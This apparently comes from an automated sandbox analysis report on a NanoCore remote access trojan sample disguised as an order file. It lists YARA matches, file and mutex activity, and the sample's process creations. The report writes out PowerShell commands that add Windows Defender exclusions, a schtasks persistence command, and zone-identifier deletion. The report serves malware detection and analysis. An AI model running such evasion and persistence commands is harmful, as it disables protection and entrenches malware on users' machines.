Source: 00000012.00000002.477033384.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.477033384.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000012.00000002.493236087.00000000057E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.493236087.00000000057E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.493731765.0000000005940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.493731765.0000000005940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.493399369.0000000005830000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.493399369.0000000005830000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.492994566.0000000005630000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.492994566.0000000005630000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.493334722.0000000005810000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.493334722.0000000005810000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: #RFQ ORDER7678432213211.exe PID: 1328, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: #RFQ ORDER7678432213211.exe PID: 1328, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: #RFQ ORDER7678432213211.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: XgPYsUfalKn.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engineClassification label: mal100.troj.evad.winEXE@15/20@0/1
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeFile created: C:\Users\user\AppData\Roaming\XgPYsUfalKn.exeJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeMutant created: \Sessions\1\BaseNamedObjects\QlFZHJmmpieHYITog
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1844:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1532:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6080:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_01
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{bf74327b-790a-4b3b-9c77-a151927b7a0c}
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeFile created: C:\Users\user\AppData\Local\Temp\tmpFD92.tmpJump to behavior
Source: #RFQ ORDER7678432213211.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: #RFQ ORDER7678432213211.exeReversingLabs: Detection: 13%
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeFile read: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe'
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe'
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\XgPYsUfalKn' /XML 'C:\Users\user\AppData\Local\Temp\tmpFD92.tmp'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe'
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe'Jump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe'Jump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\XgPYsUfalKn' /XML 'C:\Users\user\AppData\Local\Temp\tmpFD92.tmp'Jump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe'Jump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: #RFQ ORDER7678432213211.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: #RFQ ORDER7678432213211.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: #RFQ ORDER7678432213211.exeStatic file information: File size 1084928 > 1048576
Source: #RFQ ORDER7678432213211.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x108600
Source: #RFQ ORDER7678432213211.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: #RFQ ORDER7678432213211.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mscorlib.pdb source: #RFQ ORDER7678432213211.exe, 00000012.00000002.483167361.000000000124C000.00000004.00000020.sdmp
Source: Binary string: System.pdb source: #RFQ ORDER7678432213211.exe, 00000012.00000002.483005071.0000000001217000.00000004.00000020.sdmp
Source: #RFQ ORDER7678432213211.exeStatic PE information: 0x920335CE [Sat Aug 17 19:45:18 2047 UTC]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_034A2118 push eax; mov dword ptr [esp], edx8_2_034A2254
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_034A1C88 push eax; mov dword ptr [esp], edx8_2_034A1C9C
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeCode function: 18_2_0658C0E1 push es; retf 18_2_0658C1CC
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeCode function: 18_2_0658C1CD push es; retf 18_2_0658C1D0
Source: initial sampleStatic PE information: section name: .text entropy: 7.61140570465
Source: initial sampleStatic PE information: section name: .text entropy: 7.61140570465
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeFile created: C:\Users\user\AppData\Roaming\XgPYsUfalKn.exeJump to dropped file

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\XgPYsUfalKn' /XML 'C:\Users\user\AppData\Local\Temp\tmpFD92.tmp'

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeFile opened: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
